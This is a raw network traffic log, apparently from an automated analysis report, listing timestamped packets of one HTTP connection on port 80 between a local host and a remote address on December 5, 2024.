Dec 5, 2024 11:40:00.869667053 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.871248007 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.871262074 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.871299028 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.873222113 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.873235941 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.873249054 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.873275995 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.873327017 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.875293016 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.875307083 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.875360012 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.877123117 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.877135992 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.877190113 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.879069090 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.879081964 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.879126072 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.881052971 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.881064892 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.881105900 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.882949114 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.882971048 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.882982016 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.883018017 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.884927988 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.884943008 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.884980917 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.886874914 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.886888027 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.886950016 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.888835907 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.888875008 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.888911009 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.890757084 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.890770912 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.890818119 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.892731905 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.892745018 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.892755985 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.892777920 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.892812967 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.894665956 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.894680977 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.894743919 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.896639109 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.896651983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.896698952 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.898598909 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.898612022 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.898667097 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.900542021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.900554895 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.900567055 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.900599957 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.902450085 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.902471066 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.902501106 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.904428959 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.904448986 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.904474020 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.906447887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.906461954 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.906502008 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.908334970 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.908348083 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.908385038 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.910291910 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.910306931 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.910317898 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.910347939 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.910360098 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.912236929 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.912250996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.912317038 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.914190054 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.914202929 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.914241076 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:00.916167974 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.916181087 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.916193008 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:00.916270018 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.017157078 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.017608881 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.017657995 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.018465996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.018848896 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.018898964 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.019789934 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.020848036 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.020860910 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.020889997 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.022675991 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.022689104 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.022737026 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.024458885 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.024472952 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.024521112 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.026007891 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.026021957 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.026067972 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.027690887 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.027704954 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.027745008 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.029360056 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.029381990 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.029433966 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.031147003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.031182051 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.031197071 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.033164024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.033176899 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.033216000 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.035027981 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.035048008 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.035077095 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.036998034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.037013054 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.037054062 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.038943052 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.038957119 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.038969994 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.039001942 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.039020061 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.040899038 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.040919065 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.040975094 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.042845011 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.042862892 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.042906046 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.044806004 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.044821024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.044871092 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.046756983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.046772003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.046786070 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.046832085 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.048727036 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.048748970 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.048774004 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.050653934 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.050669909 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.050699949 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.052596092 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.052609921 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.052654982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.054563046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.054594040 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.054609060 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.056541920 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.056555986 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.056564093 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.056621075 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.058454990 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.058468103 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.058532953 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.060393095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.060406923 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.060447931 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.062506914 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.062525988 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.062573910 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.064591885 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.064605951 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.064618111 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.064666986 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.066282034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.066297054 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.066329956 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.068200111 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.068219900 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.068247080 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.070173979 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.070188046 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.070224047 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.072117090 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.072138071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.072163105 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.076033115 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.076087952 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.077969074 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.077982903 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.077994108 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.078033924 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.079951048 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.079962969 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.079999924 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.081882000 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.081902027 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.081933975 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.083832979 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.083848000 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.083889961 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.085839987 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.085853100 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.085865021 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.085896015 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.085908890 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.089956045 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.089972019 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.090015888 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.090338945 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.090353012 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.090425014 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.092566013 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.092602968 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.092668056 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.094244003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.094422102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.094465971 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.095577955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.095598936 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.095611095 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.095643044 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.097481966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.097529888 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.099451065 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.099464893 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.099477053 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.099509954 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.101509094 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.101530075 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.101571083 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.103368044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.103383064 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.103423119 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.105309963 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.105324984 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.105369091 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.107234955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.107249022 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.107261896 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.107292891 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.107335091 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.109380007 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.109394073 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.109437943 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.111136913 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.111150980 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.111192942 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.113030910 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.162792921 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.218367100 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.218828917 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.218885899 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.219672918 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.219686031 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.219733000 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.221188068 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.221935987 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.221978903 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.222846985 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.223594904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.223607063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.223637104 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.227128029 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.227143049 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.227199078 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.227982044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.227998018 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.228033066 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.229646921 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.229667902 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.229707956 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.231118917 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.231132984 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.231168985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.232877016 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.232891083 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.232928991 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.234708071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.234723091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.234761000 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.236531973 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.236552954 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.236583948 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.238682032 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.238696098 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.238707066 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.238751888 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.238795042 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.240451097 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.240463018 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.240504026 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.242392063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.242404938 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.242461920 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.244211912 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.244225025 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.244290113 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.245876074 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.245907068 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.245918989 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.245951891 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.247750998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.247766018 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.247801065 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.249799967 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.249820948 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.249855042 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.251602888 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.251616955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.251668930 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.253551960 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.253566027 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.253602982 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.255539894 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.255561113 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.255573988 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.255599022 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.255621910 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.257497072 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.257517099 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.257579088 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.259393930 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.259414911 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.259474993 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.261336088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.261363029 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.261408091 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.263317108 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.263350964 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.263396025 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.265249014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.265263081 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.265317917 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.267263889 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.267278910 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.267330885 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.269196033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.269211054 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.269279957 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.271135092 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.271148920 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.271184921 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.273065090 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.273077965 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.273088932 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.273133039 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.275075912 CET	80	49708	147.45.44.131	192.168.2.6
